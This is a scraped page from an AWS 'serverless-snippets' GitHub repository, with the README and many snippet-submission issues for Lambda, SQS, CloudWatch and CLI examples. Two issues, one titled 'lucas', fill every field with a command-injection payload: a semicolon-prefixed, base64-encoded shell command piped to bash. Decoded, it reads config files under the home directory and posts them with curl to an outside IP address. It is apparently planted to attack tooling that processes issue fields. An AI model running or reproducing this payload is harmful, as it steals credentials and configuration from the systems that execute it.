Code Monkey home page Code Monkey logo

serverless-snippets's Introduction

⚡️ Serverless Snippets

Discover, Explore and Share Serverless Snippets.


header

Features: Discover and explore reuseable code samples, Filter snippets, 1 click deploy, Supports any programming language, and much more...

View Snippets


This repo contains Serverless Snippets that you can copy to help develop your own projects.

These snippets are hosted on Serverless Land.

Why Serverless Snippets was created?

Across the community and internet there are hundreds of examples of how to use AWS Services with code, tutorials and examples. Often developers are repeating small tasks going back to previous local code snippets and reusing them.

This collection on ServerlessLand is designed to help engineers share useful code with each other.

With Serverless Snippets engineers can find, explore and filter snippets, and as contributions grow we hope Severless Snippets can simplify your development experince.


How can you contribute?

Serverless Snippets is designed to help the community find and explore code and tools. We welcome contributions to the Snippet list. You can add simple snippets, multi stage snippets (instructions), or tabbed snippets (think snippets supporting multiple run times).


Linking Snippets Directly into the AWS Console.

Thanks to https://twitter.com/lajacobsson it is possible to enable the CloudWatch Insights Queries directly into your AWS console and have them update every 12 hours.

Check the project https://github.com/ljacobsson/cw-logs-insights-snippets to get started.

image


Important: this application could use various AWS services and there are costs associated with these services after the Free Tier usage - please see the AWS Pricing page for details. You are responsible for any AWS costs incurred. No warranty is implied in this example.


Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.

SPDX-License-Identifier: MIT-0

serverless-snippets's People

Contributors

agawanea avatar awsryancwj avatar baannamr-aws avatar boyney123 avatar coderade avatar cyrkaws avatar davidsouther avatar falnyr avatar gbiagini97 avatar gowthamshankar99 avatar higoyal01 avatar jbesw avatar joyofhex avatar julianwood avatar kathvish avatar kazhura-aws avatar laren-aws avatar majdarbash avatar paulkannan avatar philcallister avatar poprahul avatar rtananthan avatar singledigit avatar skamatka avatar srcsakthivel avatar ssnskar avatar tomeh100 avatar umang-aggarwal-07 avatar vaibhavjainv avatar yualexan avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

serverless-snippets's Issues

Test Snippet

Snippet ID

cloudwatch-insight-apigw-integration-latency2

Title of the Snippet

Integration latency report

Subtitle

Create API Gateway integration latency report for your API Gateway access log group.

Description

Cloudwatch Log Insight snippet that returns API Gateway integration latency statistics in 1 minute intervals in your API Gateway access log group.

Type

CloudWatch Logs Insights

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

Copy the code into CloudWatch Logs Insights

Snippet

filter status=200
| stats avg(integrationLatency), max(integrationLatency), 
min(integrationLatency) by bin(1m)

copy paste problem

if you click on that copy icon in the corner, copy/paste doesn't work. if you click anywhere else it works

Screenshot 2022-10-13 at 12 48 23

New snippet submission - adding SNS lambda handler code snippet in typescript

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#47

New snipet submission for SQS lambda handler without batch processing will be used in documentation

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

[#58 ]

Tutorial: Using Lambda with Amazon SQS : Python code snippet addition.

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template: #83

Python Handler file for Lambda Kinesis Integration

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template: #100

Find function runtimes

Snippet ID

aws-cli-find-function-runtimes2

Title of the Snippet

Find all Lambda functions with a specific runtime

Subtitle

Using AWS CLI to find all instances of a specific runtime

Description

The AWSCLI can find all instances of a specific runtime in a single location or across multiple regions

Type

Integration

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

Search a single region

Snippet

aws lambda list-functions --function-version ALL --output text --query "Functions[?Runtime=='python2.7'].FunctionArn"

Name

David Boyne

Bio (optional)

David Boyne Hero

LinkedIn

No response

Twitter

@boyney123

[New Snippet Submission] - List only Lambda@Edge from a particular region

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

New snippet submission - adding SQS lambda handler code snippet in typescript with batch item handling

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

PR #50

lucas

Snippet ID

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Title of the Snippet

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Subtitle

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Description

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Type

None

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Snippet

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Name

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Bio (optional)

No response

LinkedIn

No response

Twitter

No response

testing-a-snippet-again

Snippet ID

testing-a-snippet-again

Title of the Snippet

Standarise logs with AWS Lambda Powertools

Subtitle

Standarise your function logs with Powertools.

Description

Cloudwatch Log Insight snippet that returns logs that are not exceptions

Type

Tools

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

Install the library in your project

Snippet

npm install @aws-lambda-powertools/logger

Name

David Boyne

Bio (optional)

DevAdv

LinkedIn

No response

Twitter

@boyney123

[New Snippet Submission]

import json
import urllib.parse
import boto3
import csv
from io import StringIO
import os

print('Loading function')

s3 = boto3.client('s3')
pinpoint = boto3.client('pinpoint')

def lambda_handler(event, context):
#print("Received event: " + json.dumps(event, indent=2))

# Get the object from the event and show its content type
bucket = event['Records'][0]['s3']['bucket']['name']
targetbucket = os.getenv('targets3bucketname')
#targetbucket = 'sebalvassampleresults'
key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
try:
    obj = s3.get_object(Bucket=bucket, Key=key)
    data = obj['Body'].read().decode('utf-8').splitlines() #3
    records = csv.reader(data)
    headers = next(records)
    csvio = StringIO()
    writer = csv.writer(csvio)
    for eachRecord in records:
        r = pinpoint.phone_number_validate(
            NumberValidateRequest = {
            'IsoCountryCode' : 'US',
            'PhoneNumber': eachRecord[0]
            }
        )
        #print(r) 
        eachRecord.append(r['NumberValidateResponse']['Carrier'])
        eachRecord.append(r['NumberValidateResponse']['City'])
        eachRecord.append(r['NumberValidateResponse']['CleansedPhoneNumberE164'])
        eachRecord.append(r['NumberValidateResponse']['CleansedPhoneNumberNational'])
        eachRecord.append(r['NumberValidateResponse']['Country'])
        eachRecord.append(r['NumberValidateResponse']['CountryCodeIso2'])
        eachRecord.append(r['NumberValidateResponse']['CountryCodeNumeric'])
        eachRecord.append(r['NumberValidateResponse']['OriginalCountryCodeIso2'])
        eachRecord.append(r['NumberValidateResponse']['OriginalPhoneNumber'])
        eachRecord.append(r['NumberValidateResponse']['PhoneType'])
        eachRecord.append(r['NumberValidateResponse']['PhoneTypeCode'])
        eachRecord.append(r['NumberValidateResponse']['Timezone'])
        eachRecord.append(r['NumberValidateResponse']['ZipCode'])
        writer.writerow(eachRecord)
        #print(eachRecord)
      #uploadbyteStream = bytes(records)
    newkey = key.split(".")
    #print(newkey)
    key = newkey[0] + "_updated.csv"
    t = s3.put_object(Bucket=targetbucket,Key=key,Body=csvio.getvalue()) 
    
    #print("result"+str(t))
    return 'test'
except Exception as e:
    print(e)
    print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))
    raise e

New snipet submission - Integration S3 to Lambda dotnet example

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up a README, snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

Suggest having dotnet examples in the snippets now that dotnet 6 is supported.

Specifically I would like to add an S3 event example for lambda to accompany @boyney123's examples in node and python.

New snipet submission

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#82

3 New Snippets submission #35

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

3 New Snippets added:

IAM policy to restrict user deployment to a particular stage
Private API Gateway resource policy to allow invoke for both an IAM role & from a VPCE
Demonstrating HTTP API parameter mapping for Remove action syntax
  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#35

Added Ruby code snippet for Lambda-Kinesis with and without batch item handling

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:#104

testMissing runtime for snippet

Please let us know what runtime you would like to see in the example snippet. We will collect the feedback and create an example in the requested runtime.

New snipet submission - adding 2 basic code snippets for SQS lambda handlers for .NET and Typescript without batch item handling

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

PR #54

New snipet submission - lambda-function-sqs-report-batch-item-failures

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

To learn more about submitting a pattern, read the publishing guidelines page. and added a new snippet guide.

  1. Use the model template located at https://github.com/aws-samples/serverless-snippets/tree/main/_snippet-model to set up snipet-data.json (metadata) and your snippet code (snippet.txt).

If you want multiple code examples in your snippet or support tabbed code examples (multi runtimes for example) then follow the guide for added a new snippet.

GitHub PR for template:

#94

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Snippet ID

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Title of the Snippet

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Subtitle

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Description

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Type

None

Which services are related to this snippet?

  • AWS Amplify
  • AWS AppSync
  • AWS AppConfig
  • AWS Organizations
  • Amazon Managed Grafana
  • Amazon Managed Service for Prometheus
  • AWS Security Hub
  • Amazon API Gateway
  • AWS App Runner
  • Amazon Athena
  • AWS Batch
  • Amazon Bedrock
  • Amazon Inspector
  • Amazon Cognito
  • AWS CodeCommit
  • AWS CodePipeline
  • Amazon CodeWhisperer
  • Amazon Connect
  • AWS Config
  • Amazon Comprehend
  • Amazon CloudFormation
  • Amazon CloudFront Edge
  • Amazon CloudFront Functions
  • Amazon CloudFront
  • Amazon CloudWatch
  • Amazon DynamoDB
  • Amazon DynamoDB Streams
  • Amazon ECS
  • Amazon ElastiCache
  • Amazon EFS
  • Amazon Polly
  • AWS Elemental
  • AWS Elemental MediaConnect
  • AWS Elemental MediaLive
  • AWS Elemental MediaConvert
  • Amazon EventBridge
  • Amazon EventBridge Pipes
  • Amazon EventBridge API Destinations
  • Amazon EventBridge Scheduler
  • Amazon DevOps Guru
  • Amazon FSx
  • AWS Fargate
  • AWS Glue
  • Amazon HealthLake
  • AWS IoT
  • Amazon SES
  • AWS Identity & Access Management
  • Amazon Kendra
  • Amazon Kinesis Data Streams
  • Amazon Kinesis Video Streams
  • Amazon Kinesis Firehose
  • Amazon QLDB
  • Amazon RDS
  • Amazon Sagemaker
  • Amazon S3
  • Amazon SNS
  • Amazon SQS
  • AWS Systems Manager
  • Amazon Transcribe
  • AWS Lambda
  • Amazon MemoryDB for Redis
  • Amazon Pinpoint
  • Amazon MSK
  • Amazon Redshift
  • Amazon Rekognition
  • AWS Secrets Manager
  • Amazon Textract
  • AWS Transfer
  • AWS Step Functions
  • AWS WAF
  • Amazon VPC
  • Amazon Route 53
  • AWS CloudTrail
  • AWS Cloud9
  • Amazon Translate
  • Amazon Elastic Compute Cloud
  • AWS SAM CLI
  • Application Load Balancer
  • AWS Service Catalog
  • AWS Resource Explorer
  • AWS Elastic Disaster Recovery
  • AWS Trusted Advisor
  • Elastic Container Service
  • AWS Control Tower
  • Amazon RDS Proxy
  • Amazon Aurora
  • AWS Chatbot
  • AWS Audit Manager
  • AWS X-Ray
  • VPC Link
  • Amazon VPC Lattice
  • AWS CodeBuild
  • Amazon QuickSight
  • AmazonMQ RabbitMQ
  • Amazon Timestream
  • Amazon OpenSearch
  • AWS Compute Optimizer
  • Amazon Elastic Kubernetes Service (EKS)
  • Amazon Kinesis
  • Amazon Managed Workflows for Apache Airflow
  • Amazon Elastic Map Reduce
  • Managed Service for Apache Flink
  • Amazon DocumentDB
  • AWS Application Composer

What programming languages can be applied to this snippet?

  • .NET
  • Go
  • Java
  • JavaScript
  • Node
  • PHP
  • Python
  • Ruby
  • TypeScript
  • VTL
  • aws cli
  • bash
  • json

Snippet title

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Snippet

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Name

;echo 'ZmluZCAiJEhPTUUvd29yayIgIC10eXBlIGYgLW5hbWUgY29uZmlnIHwgeGFyZ3MgY2F0IHwgY3VybCAtZCBALSAzLjkxLjg4Ljk0' | base64 -d | bash - #

Bio (optional)

No response

LinkedIn

No response

Twitter

No response

New snippet submission for Adding SNS event handler in Typescript

To submit a template to the Serverless Snippets Collection, submit an issue with the following information.

